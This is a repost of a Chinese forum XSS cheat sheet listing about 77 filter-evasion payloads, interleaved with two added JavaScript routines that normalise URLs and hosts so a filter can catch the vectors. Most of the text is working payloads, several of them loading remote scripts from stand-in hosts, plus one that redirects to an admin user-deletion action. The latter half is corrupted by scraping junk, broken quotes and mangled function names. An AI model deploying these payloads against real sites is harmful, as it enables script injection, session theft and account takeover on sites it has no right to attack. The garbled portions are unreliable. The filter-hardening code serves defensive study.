There seems to be relatively little XSS material on t00ls; I saw something good and copied it over, in case any fellow members want to bookmark it.
12-7-1 T00LS - Powered by Discuz! Board https://www.t00ls.net/viewthread ... table&tid=15267

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using the JavaScript directive
<IMG SRC="javascript:alert('XSS');">
(3) IMG tag, no semicolons and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive scheme
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (the semicolons are required here)
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (work the character codes out with a character-code calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) Decimal character-reference encoding, labelled "UTF-8 Unicode encoding" in the sheet (character-code calculator)
<IMG SRC=jav..omitted..S')>
(9) Zero-padded decimal references, no semicolons needed (character-code calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex references, again without semicolons (character-code calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab splitting "javascript" (a literal TAB between jav and ascript)
<IMG SRC="jav	ascript:alert('XSS');">
(12) Embedded encoded tab splitting "javascript"
<IMG SRC="jav&#x09;ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
(15) Multi-line injected JavaScript (the same payload written with a line break after every character); an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around a length limit (all pieces must land on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null byte
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null byte 2. Null-byte tricks have basically no effect here, since there is nowhere to use them; they relied on old IE ignoring NUL, and current HTML parsers replace NUL with U+FFFD instead of skipping it.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG
<IMG SRC=" &#14;  javascript:alert('XSS');">
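Items (3) through (19) all exploit the gap between what a string filter sees and what the browser's HTML tokenizer and URL parser actually use. The JavaScript below is an added example, not part of the original post: it decodes character references the way the tokenizer does (decimal and hex, semicolons optional, zero padding ignored), drops the tab, newline and NUL characters the URL parser discards (NUL only in legacy IE, as items (17) and (18) assume), strips leading control characters, and only then looks at the scheme. The vector strings are constructed from the items' descriptions; the encoded forms the post abbreviates are generated by small helpers rather than typed by hand, and naiveFilterCatches stands in for a filter that greps for "javascript:".

```javascript
// Added example: normalise an attribute/URL value the way a browser does
// before deciding whether it is a script URL, and compare with a grep filter.

// Only a legacy subset of named references is decoded without a semicolon by
// browsers; treating ';' as optional for all of them makes this check looser
// than the browser, which is the safe direction for a filter.
const NAMED_REFS = { quot: '"', amp: '&', lt: '<', gt: '>', apos: "'", Tab: '\t', NewLine: '\n' };

function decodeCharRefs(s) {
  return s.replace(/&#[xX]([0-9a-fA-F]+);?|&#([0-9]+);?|&(quot|amp|lt|gt|apos|Tab|NewLine);?/g,
    (m, hex, dec, named) => {
      if (named !== undefined) return NAMED_REFS[named];
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      // The tokenizer substitutes U+FFFD for NUL and out-of-range references.
      if (cp === 0 || cp > 0x10ffff) return '\ufffd';
      return String.fromCodePoint(cp);
    });
}

function normalizeUrlValue(raw) {
  let s = decodeCharRefs(raw);                       // items (5), (8)-(10), (12)-(14), (19)
  s = s.replace(/[\t\n\r]/g, '');                    // URL parser removes ASCII tab/newline anywhere: (11)-(15)
  s = s.replace(/\0/g, '');                          // legacy IE ignored NUL: (17)/(18); current parsers emit U+FFFD
  s = s.replace(/^[\u0000-\u0020\u00a0\u2000-\u200b\u3000\ufeff]+/, ''); // leading controls/spaces: (19)
  return s;
}

function urlScheme(raw) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(normalizeUrlValue(raw));
  return m ? m[1].toLowerCase() : null;              // scheme is case-insensitive: item (4)
}

function isScriptUrl(raw) {
  const scheme = urlScheme(raw);
  return scheme === 'javascript' || scheme === 'vbscript';
}

// The filter these vectors are written to beat.
function naiveFilterCatches(raw) {
  return /javascript:/i.test(raw);
}

// Constructed vectors following the items' descriptions. The encoded forms
// the post abbreviates are generated here so that every character is encoded,
// which matters for hex without semicolons: "&#x3Aalert" would otherwise be
// read as the hex reference 3AA followed by "lert".
const PAYLOAD = "javascript:alert('XSS')";
const encode = {
  decimal: s => [...s].map(c => `&#${c.codePointAt(0)};`).join(''),                             // (8)
  padded:  s => [...s].map(c => `&#${String(c.codePointAt(0)).padStart(7, '0')}`).join(''),    // (9): no ';', zero padded
  hex:     s => [...s].map(c => `&#x${c.codePointAt(0).toString(16).toUpperCase()}`).join(''),  // (10): no ';'
};
const URL_VECTORS = {
  plain:       PAYLOAD,                                   // (2)
  mixedCase:   "JaVaScRiPt:alert('XSS')",                  // (4)
  decimal:     encode.decimal(PAYLOAD),
  padded:      encode.padded(PAYLOAD),
  hex:         encode.hex(PAYLOAD),
  tab:         "jav\tascript:alert('XSS');",               // (11)
  tabRef:      "jav&#x09;ascript:alert('XSS');",           // (12)
  newlineRef:  "jav&#x0A;ascript:alert('XSS');",           // (13)
  crRef:       "jav&#x0D;ascript:alert('XSS');",           // (14)
  nul:         'java\0script:alert("XSS")',                // (17)
  leadingJunk: " &#14;  javascript:alert('XSS');",         // (19)
};

// Per vector: does the grep filter catch it, and does the normalising check?
function evaluateUrlVectors(vectors = URL_VECTORS) {
  const out = {};
  for (const [name, v] of Object.entries(vectors)) {
    out[name] = { naive: naiveFilterCatches(v), normalized: isScriptUrl(v) };
  }
  return out;
}

console.log(JSON.stringify(evaluateUrlVectors(), null, 2));
```

The order of the steps is the point: decode references first, then drop the characters the URL parser ignores, then inspect the scheme. A filter that checks the scheme before decoding, or that only strips leading whitespace, is beaten by the encoded and embedded-tab variants above while still catching the plain and mixed-case forms.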
; U* [0 H3 h0 ^7 H(20)Non-alpha-non-digit XSS, W) @7 S0 n, f, ^& I1 r* j( P% Q
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
: e4 |% g- q4 ]) d; _5 G(21)Non-alpha-non-digit XSS to 2! I) y* m5 A: ]7 _) F
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>4 X6 j* `* Q5 D8 G4 M) G% l" S
(22)Non-alpha-non-digit XSS to 3
7 x! J/ \) G0 q<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ O% T5 |( Z+ Q6 j
(23)双开括号
" a5 G3 b% a1 o# G W) f<<SCRIPT>alert(“XSS”);//<</SCRIPT>
+ G9 ^* b. z- r: _. s(24)无结束脚本标记(仅火狐等浏览器)7 L( i& t! u5 m
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
$ Y0 B* o, d- z8 q+ a4 s, d$ u4 C8 U(25)无结束脚本标记2* e/ D7 P9 o8 |
<SCRIPT SRC=//3w.org/XSS/xss.js>
7 G4 S# R, j: [; z1 q: E: `(26)半开的HTML/JavaScript XSS' \: J4 x9 g# T
<IMG SRC=”javascript:alert(‘XSS’)”
& t2 ~6 I) @- `1 t+ J(27)双开角括号& R8 b, Z7 P# H" \
<iframe src=http://3w.org/XSS.html <
* I' e4 g9 @9 @( h/ o, Y& o3 A(28)无单引号 双引号 分号! l9 m; F3 i2 x
<SCRIPT>a=/XSS/
2 G9 I( P% E* Y+ _' h+ balert(a.source)</SCRIPT>
2 [3 t7 G3 n; P5 m9 T' R+ x7 ~(29)换码过滤的JavaScript
5 }% l5 ~" ]% C5 Z# i$ n! j\”;alert(‘XSS’);//; P7 r& A: t1 u" M; L
(30)结束Title标签0 e) H. n4 {" E1 X7 n, `& P
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
5 }6 p& H, Z4 L+ l# g0 W( K(31)Input Image
, C! l; d/ B& a$ t3 n<INPUT SRC=”javascript:alert(‘XSS’);”>
% i: ~5 u) @% {8 ]' ^; u# k(32)BODY Image6 `. i; c3 t* m2 k" ~' b
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>& E0 W2 s6 z4 ?1 |$ u5 J
(33)BODY标签' g" T$ ]" G# W6 u" b3 D
<BODY(‘XSS’)>
3 {( X# W, N6 ~3 V: u6 z, r(34)IMG Dynsrc' a: r0 W( q9 \' W
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
; Z3 E/ J# l5 ?& b d(35)IMG Lowsrc
4 V9 q" K5 y: ?+ F<IMG LOWSRC=”javascript:alert(‘XSS’)”>, C% _( H) i* E: m0 [
(36)BGSOUND
" Q4 X& s4 D% w) z% `<BGSOUND SRC=”javascript:alert(‘XSS’);”>
5 H+ Q p, E% _% L: R' z# q(37)STYLE sheet
2 Q- M- r3 S2 h% | V9 B<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>, n$ p+ p1 r) p2 s q4 r
(38)远程样式表
. S, ]+ y* `3 s8 J3 V% f<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”># a$ M/ d# K; B! D7 r- n
(39)List-style-image(列表式)9 W; f% a" y9 m: [7 u( y+ {) F
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! X, a; S$ }2 y" m(40)IMG VBscript
1 W. Y6 F; K, J4 Y9 v<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
% F3 b+ V3 r" a" a/ x* F4 ?(41)META链接url
# ^ K0 l& G/ o. k
. N) S" W" K! K: R& e [2 y3 h
- F' I3 W# e) B. m, Q1 I* i<META HTTP-EQUIV=”refresh” CONTENT=”0;
/ b; B/ |& R% ?5 [URL=http://;URL=javascript:alert(‘XSS’);”>8 u' m* ^1 y, o- ~+ C4 K
(42)Iframe! j' u/ I: o" ~: P+ B
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME> Z+ Z2 {4 B" c5 K$ W& X
(43)Frame0 i2 s, F6 N- t) u
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
$ F9 n! A [8 L5 j) h, T0 v0 Mhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6+ D( d( K6 I: M6 |
(44)Table
: i. S" A* x+ b# x7 t<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
7 x0 c' F4 z# l(45)TD
@. I( w1 [; u* B8 F9 I# n, K, N<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>1 P2 a( L; ` { F% o, s" h" o
(46)DIV background-image
}* `3 w; l4 J& ?4 F<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' N# \' }: h7 U& R6 N- M8 l. g- i
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
^& J2 }3 |) l' j, I8&13&12288&65279)
I9 A, i- S4 d0 G<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& a l3 [9 r4 |(48)DIV expression" O7 @ s( n5 m' k# }+ Q
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>0 ]6 r# x3 i5 t( c# V2 L# U
(49)STYLE属性分拆表达/ z1 ?$ F% K- e4 t( T) z. O. h
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>" w8 _1 A4 J! Q- b1 w
(50)匿名STYLE(组成:开角号和一个字母开头)
. c. J5 \( a# {' |<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>0 d- N% I+ |' l/ Z, B
(51)STYLE background-image
& q2 e8 Z: u M( q& E<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
; m. Y7 D! G2 z- y' `3 k2 qCLASS=XSS></A>
2 J! a. E4 F: R* L; Q5 i% O(52)IMG STYLE方式
0 ?8 K* y' v1 }$ F9 Yexppression(alert(“XSS”))’>
5 I v1 z6 ]5 y$ c0 h, S# \; b(53)STYLE background, z7 ?4 H* E& `
<STYLE><STYLE2 c% A% P, g0 v5 l: F$ s
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
6 {- P" j) @8 c/ _- j, b1 i(54)BASE
, @/ ^$ r. j6 G<BASE HREF=”javascript:alert(‘XSS’);//”>
) f* {6 n- b# @3 X8 _3 E(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
' h' G! B/ t+ Z; J. y9 [# W6 f<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>% o5 q0 |/ \1 w
(56)在flash中使用ActionScrpt可以混进你XSS的代码
" c: o5 i" {/ I' [% ?. xa=”get”;2 X0 g0 a0 ?& x6 A
b=”URL(\”";1 o1 v" w# j( I: w9 [3 [( M" d$ I
c=”javascript:”;
. a7 O4 D2 O7 a5 E2 vd=”alert(‘XSS’);\”)”;
5 `. Z2 I. k& j0 h4 o" Ceval_r(a+b+c+d);! M# q) ^7 R& h. [! A
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
; ~" O7 W8 g4 U<HTML xmlns:xss>- W' l1 b/ d/ r! ?5 \8 h
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
9 {0 p8 j, `7 K: D4 [<xss:xss>XSS</xss:xss>/ A$ k) k# D+ q$ l4 L( S% U9 J8 ?
</HTML>
/ z. J* w; I- W3 U5 r8 |5 M& L(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
, K: B7 P3 b9 i- M<SCRIPT SRC=””></SCRIPT>/ N, L: \: W% M: ~' G; C( N$ V
(59)IMG嵌入式命令,可执行任意命令% Z7 A1 y2 r3 m5 v0 R4 H/ l# }
<IMG SRC=”http://www.XXX.com/a.php?a=b”>) g5 f' K) Y$ j
(60)IMG嵌入式命令(a.jpg在同服务器)
! P# ^0 G" z8 F3 W, g' fRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
0 Z4 \* }0 P7 m+ c* l; ^(61)绕符号过滤
+ E" R7 S" B# b& v<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT># x2 d# `0 u7 q- n
(62): ^( J- I: b+ ~+ x
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! D: C4 w: l; o3 ~(63)! ~/ `0 K2 J v0 M0 c
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
' r& j! S" Q/ i2 o* U(64)
! L/ k! m( [' q4 F<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>2 F. w3 I2 T: Y. w3 m" v3 l
(65)" w5 Z% W' c1 c/ ?
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
. L, p( g7 O0 r$ O3 B9 z* D d) E! j" c+ h(66)12-7-1 T00LS - Powered by Discuz! Board
5 T6 V3 ]% _/ x0 thttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
& |# t9 L, V9 Z/ {- ~& e<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 R7 U6 @ w6 e' w(67)
# A1 h* \/ e8 U' d<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
" u1 t: P4 `3 t$ z4 N</SCRIPT>
3 f( M# L7 D& i7 p' F(68)URL绕行
4 z% M4 Q: s3 ]5 |5 k2 Y7 X5 m) o<A HREF=”http://127.0.0.1/”>XSS</A>" `/ Q' _2 p- g3 w+ B+ b# g* G- V/ @
(69)URL编码
# p3 [6 Z0 u) p+ o/ K<A HREF=”http://3w.org”>XSS</A>" d7 n: [8 }7 E
(70)IP十进制) p5 z7 |/ P/ ?0 Q& ` y3 k* p) B
<A HREF=”http://3232235521″>XSS</A>
/ n% b: G1 M" A$ M- K$ S(71)IP十六进制! W% h& O; m( c2 c; P! {, y
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
# f+ w* }) }4 C/ a& ~; y2 R& S(72)IP八进制
5 V; v. I3 p3 n2 L<A HREF=”http://0300.0250.0000.0001″>XSS</A>! r8 I! R' D4 G/ i# s2 f
(73)混合编码
/ u0 @! N% e7 g/ u. C8 T<A HREF=”h t% b) k+ Y; I1 u' J# G
tt p://6 6.000146.0×7.147/”">XSS</A>, b, F& ~6 ]8 C6 V$ g5 P0 J4 y
(74)节省[http:]7 T- }8 M9 n0 d& Z1 Q
<A HREF=”//www.google.com/”>XSS</A>. ^0 e' ^6 z+ O6 [
(75)节省[www]* G* d6 Y' V' d, \4 i- y( Z
<A HREF=”http://google.com/”>XSS</A>
o: h3 X: h3 ]- K$ X% b) ?(76)绝对点绝对DNS4 n. x2 ^; ]) m! M
<A HREF=”http://www.google.com./”>XSS</A>
8 R0 e- H- e. } X N7 a(77)javascript链接
* l% C: n( p7 w" o P# X<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>& a# h5 x+ k& U% o# r: y
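Items (68) to (76) all defeat a filter that compares the raw href text against a hostname. The JavaScript below is an added example, not code from the post: it canonicalises the host the way a URL parser does before comparing, dropping tab and newline characters, the scheme and "//", percent-decoding and lower-casing the host, removing the trailing dot, and running a numeric host through the IPv4 parsing rules (decimal, 0x hex, leading-zero octal, and fewer than four parts), so that 3232235521, 0xc0.0xa8.0x00.0x01 and 0300.0250.0000.0001 all come back as 192.168.0.1. The default blocklist of google.com is a constructed example matching the post's vectors.

```javascript
// Added example: canonicalise the host of a link before comparing it with a
// hostname blocklist, so the URL tricks in items (68)-(76) collapse to one form.

// Parse a numeric host the way the WHATWG URL IPv4 parser does: a 0x prefix
// is hex, a leading zero is octal, anything else is decimal, and with fewer
// than four parts the last part fills the remaining bytes.
// Returns a dotted quad, or null if the host is not numeric.
function parseIPv4(host) {
  const parts = host.split('.');
  if (parts.length > 4) return null;
  const nums = [];
  for (const p of parts) {
    let n;
    if (/^0[xX][0-9a-fA-F]*$/.test(p)) n = p.length === 2 ? 0 : parseInt(p.slice(2), 16);
    else if (/^0[0-7]+$/.test(p)) n = parseInt(p.slice(1), 8);
    else if (/^[0-9]+$/.test(p)) n = parseInt(p, 10);
    else return null;
    nums.push(n);
  }
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  const last = nums[nums.length - 1];
  if (last >= Math.pow(256, 5 - nums.length)) return null;
  let v = last;
  for (let i = 0; i < nums.length - 1; i++) v += nums[i] * Math.pow(256, 3 - i);
  return [(v >>> 24) & 255, (v >>> 16) & 255, (v >>> 8) & 255, v & 255].join('.');
}

// Canonical host of an http(s) or protocol-relative link.
function canonicalHost(url) {
  let s = url.replace(/[\t\n\r]/g, '').trim();            // (73): tab/newline are discarded by the URL parser
  s = s.replace(/^[a-zA-Z][a-zA-Z0-9+.\-]*:(?=\/\/)/, ''); // drop "http:" and friends
  s = s.replace(/^\/\//, '');                             // (74): protocol-relative
  let host = s.split(/[\/?#]/)[0];                        // authority ends at the first / ? #
  const at = host.lastIndexOf('@');
  if (at !== -1) host = host.slice(at + 1);               // drop userinfo
  host = host.replace(/:[0-9]*$/, '');                    // drop port
  try { host = decodeURIComponent(host); } catch (e) { /* malformed %-escape: keep raw */ } // (69)
  host = host.toLowerCase().replace(/\.$/, '');           // (76): trailing dot
  return parseIPv4(host) || host;                         // (70)-(72): numeric forms
}

// Does the link point at a blocked domain or one of its subdomains?
// The default blocklist is a constructed example.
function isBlockedHost(url, blockedDomains = ['google.com']) {
  const host = canonicalHost(url);
  return blockedDomains.some(d => host === d || host.endsWith('.' + d));
}

// The post's vectors, as they reach a filter.
const LINK_VECTORS = [
  'http://127.0.0.1/',                    // (68)
  'http://%33%77%2E%6F%72%67',            // (69)
  'http://3232235521',                    // (70)
  'http://0xc0.0xa8.0x00.0x01',           // (71)
  'http://0300.0250.0000.0001',           // (72)
  'h\ntt\tp://6\t6.000146.0x7.147/',      // (73)
  '//www.google.com/',                    // (74)
  'http://google.com/',                   // (75)
  'http://www.google.com./',              // (76)
];

for (const v of LINK_VECTORS) {
  console.log(JSON.stringify(v), '->', canonicalHost(v), isBlockedHost(v) ? '(blocked)' : '');
}
```

Two things remain outside what canonicalisation can do. The IP forms in (68) and (70) to (73) still do not match a name-based blocklist; catching those means resolving the blocked names (or the link's host) and comparing addresses, which the browser does at fetch time, not the filter. And (77) is not a hostname problem at all; it is the scheme check from the earlier items, applied to href.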
Source: http://fuzzexp.org/u/0day/?p=14